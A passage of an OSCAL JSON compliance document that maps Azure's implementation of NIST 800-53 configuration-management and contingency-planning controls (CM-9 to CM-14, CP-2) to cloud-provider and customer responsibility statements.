All Azure service teams are required to comply with all SOPs, which are maintained appropriately. * Azure Security Baseline Governance Standard Operating Procedure (SOP) * Azure Security Development Lifecycle Standard Operating Procedure (SOP) * Azure Hardware Change and Release Management Standard Operating Procedure (SOP) * Azure Software Change and Release Management Standard Operating Procedure (SOP)"}],"responsibilities":[{"uuid":"1855d531-2a46-42cb-85dd-c4732c632b38","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that addresses roles, responsibilities, and configuration management processes and procedures.","provided-uuid":"03725d94-bf77-4975-b941-4d2a42692bb0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4e2b94e0-5f17-4c19-aded-f2187f6fe83f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.b","by-components":[{"uuid":"eb290678-b842-4469-b1d7-15db06f5297b","export":{"provided":[{"uuid":"1aa9a7f8-7d19-4036-8ac7-1b276813917d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"}],"description":"The Azure SOPs define configuration items at the hardware and software levels.
"}],"responsibilities":[{"uuid":"e95f423c-ee64-4351-a6db-a82ec4179cd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that establishes a process for identifying configuration items throughout the system development life cycle and for managing the configuration of customer-deployed resources.","provided-uuid":"1aa9a7f8-7d19-4036-8ac7-1b276813917d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a35139f3-49d8-4e74-88fc-6aa61488f3c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.c","by-components":[{"uuid":"a1e3e2de-2f4e-44ea-8cbe-3574f41dc2c5","export":{"provided":[{"uuid":"f547e99e-431b-48b1-adc4-b06353e9a5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"}],"description":"Azure defines the configuration items for the information system. Azure aligns with Microsoft's Security Development Lifecycle (SDL) process which documents each phase of development that must be followed for all engineering projects. The Azure SOPs cover the change management process around information system design, development, and implementation of changes. 
When a component of Azure is initiated using the SDL process, it is placed under the Microsoft and Azure configuration management requirements."}],"responsibilities":[{"uuid":"d00d483b-1748-4e9d-b7ce-6b5a8904c55f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that defines the configuration items for the customer-deployed resources and places the configuration items under configuration management.","provided-uuid":"f547e99e-431b-48b1-adc4-b06353e9a5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c12bc19e-5467-4bd3-808f-57e7a706fd04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.d","by-components":[{"uuid":"0abc597e-1373-4a72-9bc8-17c4e43c73fd","export":{"provided":[{"uuid":"c0e8433a-0a33-421e-8361-faf43a44d97e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"}],"description":"The Azure SOP Review Process Authority reviews and approves Azure SOPs on an annual basis."}],"responsibilities":[{"uuid":"a21379bb-b0f7-4a5e-9ca1-6da1afb3b666","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and approving the configuration management plan.","provided-uuid":"c0e8433a-0a33-421e-8361-faf43a44d97e"}]},"description":"See 
inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"07a54661-6d2f-4306-ba4d-06ac79fea318","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.e","by-components":[{"uuid":"11275fed-958d-42ab-9446-b8573f344903","export":{"provided":[{"uuid":"786c1e21-9a8b-4bc6-aa34-bb8ce37cb790","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"}],"description":"The Azure SOPs are stored within the Azure SharePoint site, which has functionality enabled to protect against unauthorized disclosure and modification."}],"responsibilities":[{"uuid":"f52667a7-c90b-4fb5-8b30-bcd22b41cb42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that protects the configuration management plan from unauthorized disclosure and modification.","provided-uuid":"786c1e21-9a8b-4bc6-aa34-bb8ce37cb790"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6b889282-0cf1-40bd-8303-677377709954","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-10","statements":[{"uuid":"714481b6-f600-4dd6-8fa2-e7818272691b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.a","by-components":[{"uuid":"0f1fcdfe-7775-4701-a6b8-1f486f4e72c6","export":{"provided":[{"uuid":"5f69dbfa-ebb2-4746-8204-6bc43f5f4acf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"}],"description":"The Microsoft Acceptable Use Standard outlines the Online Services specific acceptable usage standards of the Infrastructure & Services technology assets, including criteria such as whether roles can make copies of copyrighted software. The Copyright Policy also contains information on how Microsoft respects copyright law. In accordance with the Third Party Software Policy, Azure uses software according to contractual agreements. This portion of the corporate policy states the following: Unlike other types of finished goods, software is not owned by end users, but licensed through a contractual agreement which defines the terms and conditions that govern the license grant and restrict the product's use. 
These terms and conditions may change over time through amendment, renewal, termination, expiration, etc."}],"responsibilities":[{"uuid":"32efeec2-7e35-41a0-af4e-679221a72650","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"}],"description":"The customer is responsible for using software and associated documentation in accordance with contract agreements and copyright laws.","provided-uuid":"5f69dbfa-ebb2-4746-8204-6bc43f5f4acf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3a481bf3-41ae-4896-bb3a-e8de78b00641","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.b","by-components":[{"uuid":"87ef33cf-8192-46be-a520-2fb63b34c159","export":{"provided":[{"uuid":"c9bc6335-4e6f-4ac5-b5c4-a7779d55202d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"}],"description":"The Microsoft Security Policy outlines the software usage restrictions for Azure and requires all Azure applications, including those developed or hosted by and/or purchased from third parties, to undergo a comprehensive security review before entry into the Azure environment. 
In addition, no software is to be deployed or used in Azure's production environment without formal approval as required by the Microsoft Security Policy. In-house software used within the Azure boundary is developed by Microsoft and, therefore, not subject to contractual requirements, copyright restrictions, and license monitoring for compliance with third-party relationships. In accordance with the Third Party Software Policy, all third-party software must be purchased through a corporate function to enable tracking of all software purchases, compliance with software licensing terms, and corporate risk reduction from exposure to licensing agreements. Microsoft complies with all software usage requirements as defined by the contractual agreement with the vendor."}],"responsibilities":[{"uuid":"87f509e9-b793-486a-b1d7-fcd0f6a7c68c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"}],"description":"The customer is responsible for tracking the use of software and associated documentation protected by quantity licenses.","provided-uuid":"c9bc6335-4e6f-4ac5-b5c4-a7779d55202d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4473ef55-43e6-4558-b09e-06f5775e0aad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.c","by-components":[{"uuid":"7eca44f7-ab68-411f-bc2b-10faa66eed25","export":{"provided":[{"uuid":"6286d378-f636-4302-b16c-d6567992a049","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"}],"description":"Azure configures the information system to provide only essential capabilities and specifically prohibits or restricts the use of functions, ports, protocols, and/or services as per industry best practice guidelines. Any use of peer-to-peer (P2P) networking in the environment is denied by default. If needed, P2P networking would be managed as an exception through the security review process. 
Furthermore, Azure prohibits the distribution of pirated software in accordance with Microsoft Policy."}],"responsibilities":[{"uuid":"31da14c9-9c02-41db-997d-5d8ba7ac3712","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"}],"description":"The customer is responsible for controlling and documenting the use of peer-to-peer (P2P) file sharing technology to prevent unauthorized distribution, display, performance, or reproduction of copyrighted work.","provided-uuid":"6286d378-f636-4302-b16c-d6567992a049"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7b1cf1d5-b812-47f1-9fcd-9c38673fcbac","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-11","statements":[{"uuid":"3b7eeded-0fc4-4931-8d7e-6bb6b79be57f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.a","by-components":[{"uuid":"08a2011c-b569-42b3-834b-5381f90ed9b3","export":{"provided":[{"uuid":"65115fff-97f5-4499-9b46-e606976da118","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"}],"description":"The Microsoft Security Policy outlines the Microsoft user-installed software restrictions for Azure. 
In accordance with the policy, all software installed in the Azure environment, prior to being released into production, must go through the change management process and be approved by the appropriate stakeholders. The following guidelines are in place regarding the installation of software, including open source software, within the Azure environment: * All software installed within Azure must be approved by the appropriate stakeholders prior to being released into production. * Prior to deployment in Azure, all software must be tested in a manner suitable to Microsoft to evaluate its impact on system performance, stability (failure and recovery characteristics) and security state (security controls work as expected and the product does not contain malicious code). * Software submitted for approval must have a legitimate business purpose. Additionally, open source software must be evaluated by CELA in accordance with the policies and processes set out in Microsoft's open source software resource website. 
Requests for evaluation of open source software require approval through the OSS Registration Tool."}],"responsibilities":[{"uuid":"dbb2ecf3-9309-4cca-9e4d-4ca335dc9af0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"}],"description":"The customer is responsible for establishing a policy governing the installation of software on customer-deployed resources by users.","provided-uuid":"65115fff-97f5-4499-9b46-e606976da118"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"263fea37-28c7-4fdd-ac63-f9c400e3dbbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.b","by-components":[{"uuid":"425fef38-172d-413f-a5af-f6340b6a6c4e","export":{"provided":[{"uuid":"bb43306c-1ea4-48d1-bab9-870afc6dad52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"}],"description":"Azure enforces software installation policies through configuration control processes and access restrictions for change."}],"responsibilities":[{"uuid":"9ce4f29e-8deb-4df9-ac97-9afddaddc2df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"}],"description":"The customer is responsible for enforcing software installation policies.","provided-uuid":"bb43306c-1ea4-48d1-bab9-870afc6dad52"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"05efb18f-cff6-4eda-aebe-9447f13dd7e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.c","by-components":[{"uuid":"c13af72e-1703-493e-8517-f7d3e800a1cc","export":{"provided":[{"uuid":"998ad78e-f2ab-42ef-91f7-2a307847f17e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"}],"description":"Azure monitors compliance by reviewing and updating configuration settings and configuration baselines of hardware, software and network devices at least annually. Changes are developed, tested and approved in a development and/or test environment prior to entering the production environment."}],"responsibilities":[{"uuid":"fccf6b24-4c5d-4a53-b67b-3bd8c0d2a4a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"}],"description":"The customer is responsible for monitoring the compliance of customer-deployed resources with the policies identified in CM-11.a.","provided-uuid":"998ad78e-f2ab-42ef-91f7-2a307847f17e"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"25d0d34d-0cf2-4a99-a8c7-eca4ea0fa537","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-12","statements":[{"uuid":"5cbb4643-29bb-4615-8b57-edc4055f8eba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.a","by-components":[{"uuid":"14ed359d-4bfc-4da6-885c-e777ec2110ff","export":{"provided":[{"uuid":"2a8b7e67-4d35-41df-9f97-51dbe061d5f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. 
The physical address locations of Azure datacenters are documented in the facility manager tool utilized by datacenter personnel."}],"responsibilities":[{"uuid":"84ea3d2a-cf35-4fba-83ee-29c16f30a27a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"}],"description":"The customer is responsible for identifying and documenting the location of system inventory components for customer-deployed resources.","provided-uuid":"2a8b7e67-4d35-41df-9f97-51dbe061d5f1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"627b717a-8646-4af0-b588-5f3efd0d73a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.b","by-components":[{"uuid":"d1fe7fc5-8373-402b-93f5-392f1e018cad","export":{"provided":[{"uuid":"d4f77e7b-51a1-457f-8f8c-32ca733fc818","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in the facility manager tool utilized by datacenter personnel. 
If changes to the location of the Azure datacenters occur within the United States, data center personnel will document the occurrence in the facility manager tool."}],"responsibilities":[{"uuid":"51f0396d-2b9e-4294-a36a-55ccdb6b909b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"}],"description":"The customer is responsible for building out appropriate access control procedures for managing personnel who have access to the inventory system components for customer-deployed resources.","provided-uuid":"d4f77e7b-51a1-457f-8f8c-32ca733fc818"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b24b3113-ebd5-485c-a060-3abd34cae365","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.c","by-components":[{"uuid":"5cf397d8-8f52-45e0-a090-a950aa6cd2cd","export":{"provided":[{"uuid":"87c2d93e-b343-4326-ae33-fd21ed8c51f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in the facility manager tool utilized by datacenter personnel. 
If changes to the location of the Azure datacenters occur within the United States, data center personnel will document the occurrence in the facility manager tool."}],"responsibilities":[{"uuid":"e16b2238-f927-46fc-b804-24cc26e4d948","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"}],"description":"The customer is responsible for managing changes relating to the location of the system inventory components for customer-deployed resources.","provided-uuid":"87c2d93e-b343-4326-ae33-fd21ed8c51f6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"86a86371-b7ca-44a9-8165-7e2ebcad3479","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-12.1","statements":[{"uuid":"1422ce63-2cb4-4f31-bba1-ed1f1ee6ef0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12.1_smt","by-components":[{"uuid":"566e476a-4790-4423-a2ff-3e50b5a6e937","export":{"provided":[{"uuid":"57d8b810-2750-497c-bbbc-2243ee54a5e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. 
The physical address locations of Azure datacenters are documented in the facility manager tool utilized by datacenter personnel. Physical access to digital media in Azure datacenters is managed by Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privileged principle. Before a person arrives at a data center, they must have a DCAT request approved by the DCM team. For logical software, privileges to Azure production services and administrative interfaces are assigned to Azure personnel based on the least privilege principles in accordance with job responsibilities. Elevated access must be approved by the respective account managers. OneIdentity aliases, used for access provisioning to resources, are based on structured business resources/rules created by the Azure service teams. They are used to grant Azure personnel access to designated and restricted security groups on least privilege principles. Service teams can obtain Just in Time (JIT) access for troubleshooting purposes. JIT is utilized to limit elevated access to a specific duration of time, eliminating the use of persistent elevated access. JIT access is provided through the JIT portal based on the workflow configured and the access is granted only to the requested assets. The access can be configured to support business needs and can range from one (1) hour to seven (24) hours and revoked based on the JIT policy settings prescribed by the resource owner. Break-Glass accounts provide the minimum permissions necessary to execute work if JIT is nonfunctioning. Access to Azure services is granted based upon need-to-know and least privileged principles. Access that has not been explicitly permitted is denied by default. 
Role-based access controls are used to allocate logical access to a specific job function or area of responsibility, rather than to an individual. If changes to the location of the Azure datacenters occur within the United States, data center personnel will document the occurrence in the facility manager tool."}],"responsibilities":[{"uuid":"4c4a82a6-493f-4b49-a258-65f0e41e1938","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"}],"description":"The customer is responsible for utilizing automated tools to identify customer-controlled information system components to ensure controls are in place to protect customer information.","provided-uuid":"57d8b810-2750-497c-bbbc-2243ee54a5e5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eb56ae24-1abb-4110-bf25-5b1fcb211d90","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-14","statements":[{"uuid":"2a026d2b-ecf9-4749-95eb-c571256d0296","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-14_smt","by-components":[{"uuid":"2201f210-332e-4314-89bf-0d976df083b7","export":{"provided":[{"uuid":"a28830dd-6331-48c3-98d1-ec1a32cf12bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"}],"description":"In accordance with Microsoft Security Program Policy (MSPP), all software installed within Azure must have a valid signature. 
The Azure System Lockdown (AzSysLock) team uses AzSecPack to monitor for unexpected running software. This is defined as any software that is not signed using the appropriate signing certificates. AzSysLock sends alerts to service teams that are not using signed code. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for running unsigned binaries are created for service owners as a Severity 2 incident in the Incident Management (IcM) system. In the scenario where the AzSysLock feature is turned off for Azure services, detections are sent to Azure service and security teams for activation actions."}],"responsibilities":[{"uuid":"db0583d9-5444-4f98-bd08-145dcf2c7f72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"}],"description":"For IaaS and PaaS assets, the customer is responsible for preventing the installation of organization-defined software and firmware components without verification that the component has been digitally signed using a certificate that is recognized and approved by the organization.","provided-uuid":"a28830dd-6331-48c3-98d1-ec1a32cf12bc"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d5470912-76fa-4bf4-934c-c7f041557720","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2","statements":[{"uuid":"bc996330-93f0-474b-8d89-46c6b3ee9a31","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.a","by-components":[{"uuid":"ddfdb49d-f598-492e-8d3f-5ef3f9de6475","export":{"provided":[{"uuid":"0b0846ee-1ed6-4ad8-ae22-f5072db5fc50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"}],"description":"The Azure Business Continuity Plan (BCP) and Azure Disaster Recovery Plan (DRP) provide the detailed processes for contingency planning for Azure. They serve as a guide for Azure to respond, recover, and resume operations during a serious adverse event. The BCP covers the actions taken by key personnel, resources, and services required to continue critical business processes and operations. This plan is intended to address extended business disruptions. The development of the DRP follows Azure Business Continuity and Disaster Recovery SOP. The DRP covers the actions taken by key personnel, resources, and services required to continue critical technology processes and operations. This plan is intended to address extended service disruptions. The development of the DRP follows Azure Business Continuity and Disaster Recovery SOP. 
These plans are followed by all technology services; however, the individual steps for recovery are stored separately by the owning service teams, and hyperlinks to each team's plans are provided to the BCM team for verification. The BCP and DRP document all program requirements and standard operating procedures used by all services, covering all commonly shared processes. The individual service plans detail how a service recovers, regardless of outage scope, in steps that can be followed by any authorized member of a service team. This allows Azure to eliminate single points of failure and ensures continuity of operations."}],"responsibilities":[{"uuid":"38a8d3c9-fe38-48b5-887a-1119be9942e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing a contingency plan for customer-deployed resources, including essential mission and business functions and associated contingency requirements; recovery objectives, restoration priorities and metrics; contact information for assigned roles/responsibilities/individuals; maintaining essential mission and business functions despite system disruption, compromise or failure; eventual, full system restoration without deterioration of originally implemented security safeguards; and review/approval of the plan by customer-defined personnel/roles. 
Note: the customer should also include any reliance on Azure functionality to perform these tasks.","provided-uuid":"0b0846ee-1ed6-4ad8-ae22-f5072db5fc50"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c39fe422-593f-4fe3-9a4f-40f060638719","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.b","by-components":[{"uuid":"a1c8271d-5ac9-469a-93e5-6131709a64bc","export":{"provided":[{"uuid":"9f33c01a-cf9b-4fdb-bc25-3e7929285d22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"}],"description":"Microsoft distributes the BCP and DRP to all personnel via SharePoint. Service plans are stored on service-team-internal SharePoint sites, Wikis, or OneNote with links to them present in the Business Continuity Disaster Recovery 